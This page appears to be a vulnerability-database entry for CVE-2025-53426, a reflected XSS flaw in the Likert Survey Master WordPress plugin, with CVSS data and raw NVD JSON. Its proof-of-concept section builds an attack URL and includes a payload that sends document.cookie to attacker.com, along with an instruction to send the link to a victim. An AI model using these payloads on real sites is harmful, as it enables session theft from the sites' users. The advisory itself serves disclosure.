Security Vulnerability Report
中文
CVE-2025-53426 CVSS 7.1 HIGH

CVE-2025-53426

Published: 2025-10-22 15:15:51
Last Modified: 2026-04-27 18:16:22

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bob Likert Survey Master likert-survey-master allows Reflected XSS.This issue affects Likert Survey Master: from n/a through <= 0.8.0.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Likert Survey Master <= 0.8.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-53426 PoC: Reflected XSS in Likert Survey Master --> <!-- Attack Scenario: Inject malicious JavaScript via URL parameter --> <!-- Malicious URL structure --> <!-- https://vulnerable-site.com/?param=<script>alert(document.cookie)</script> --> <!-- Example attack URL --> <!-- Replace TARGET_URL with the actual vulnerable site --> const targetUrl = 'https://TARGET_URL/wp-admin/admin.php?page=likert_survey_master&survey_id=<script>alert(String.fromCharCode(88,83,83))</script>'; // Automated PoC execution async function exploitXSS() { const maliciousPayload = '<script>fetch("https://attacker.com/steal?cookie="+encodeURIComponent(document.cookie))</script>'; const exploitUrl = `${targetUrl}${encodeURIComponent(maliciousPayload)}`; // Open the malicious URL (requires user interaction) console.log('Send this URL to the victim:'); console.log(exploitUrl); // Or use in iframe (if CSP allows) // const iframe = document.createElement('iframe'); // iframe.src = exploitUrl; // document.body.appendChild(iframe); } // Simple test payload const testPayload = '" onerror="alert(document.domain)" data-x="'; console.log('XSS Test Payload:', testPayload); console.log('Encoded:', encodeURIComponent(testPayload));

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53426", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:50.993", "lastModified": "2026-04-27T18:16:22.107", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bob Likert Survey Master likert-survey-master allows Reflected XSS.This issue affects Likert Survey Master: from n/a through <= 0.8.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/likert-survey-master/vulnerability/wordpress-likert-survey-master-plugin-0-8-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}